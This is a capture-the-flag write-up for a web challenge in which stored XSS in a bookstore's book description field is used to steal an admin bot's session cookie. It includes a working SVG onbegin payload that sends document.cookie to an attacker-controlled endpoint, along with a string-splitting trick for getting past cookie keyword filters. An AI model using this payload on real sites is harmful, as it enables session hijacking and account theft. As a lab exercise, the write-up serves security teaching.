Stealer Web Challenge

Web 500

Description

"Welcome to the Bookstore! We've recently implemented a new feature that allows sellers to add detailed descriptions to their books. Our admin bot regularly checks these descriptions for any inappropriate content or out-of-stock items."

Vulnerability Overview

This challenge featured a classic Cross-Site Scripting (XSS) vulnerability that could be leveraged for session hijacking. The goal was to extract the admin bot's session cookie, which contained the flag.

The vulnerability existed in the book description field, which failed to properly sanitize user input. This allowed injection of JavaScript code that would execute when the admin bot viewed the book details.

Exploitation Strategy

  1. Create a seller account to gain access to book creation functionality
  2. Add a book with a specially crafted XSS payload in the description
  3. Ensure the book would be reviewed by the admin bot
  4. Capture the admin's session when they viewed the malicious description

Step 1: Initial Reconnaissance

After registering for an account, I discovered the application allowed users to:

  • Register as either buyers or sellers
  • Sellers could create book listings with detailed descriptions
  • Buyers could report books that were listed as in stock but actually unavailable
  • An admin bot would review these reports and check the book descriptions

This admin review process presented an opportunity to execute client-side code in the admin's browser context.

Step 2: Crafting the XSS Payload

I created a seller account and added a book with the following XSS payload in the description field:

XSS Payload HTML 
<svg><animate onbegin="location='link?c='+document['coo'+'kie']" attributename=x>

This payload uses the onbegin event handler in SVG animations to exfiltrate cookies. The string concatenation (['coo'+'kie']) bypasses simple filters that block the word "cookie".

Step 3: Triggering Admin Review

  1. Set the book's stock to 0 to mark it as out of stock
  2. Created a second account as a buyer
  3. Reported the book as out of stock through the buyer interface

This triggered the admin review process, where the admin bot automatically visited the book's page to verify the report.

Step 4: Capturing the Flag

When the admin bot visited the book description page, the SVG animation triggered and executed the JavaScript payload, sending the admin's cookies to my controlled endpoint. The request contained the admin's session cookie with the flag.

Flag

FlagY{******}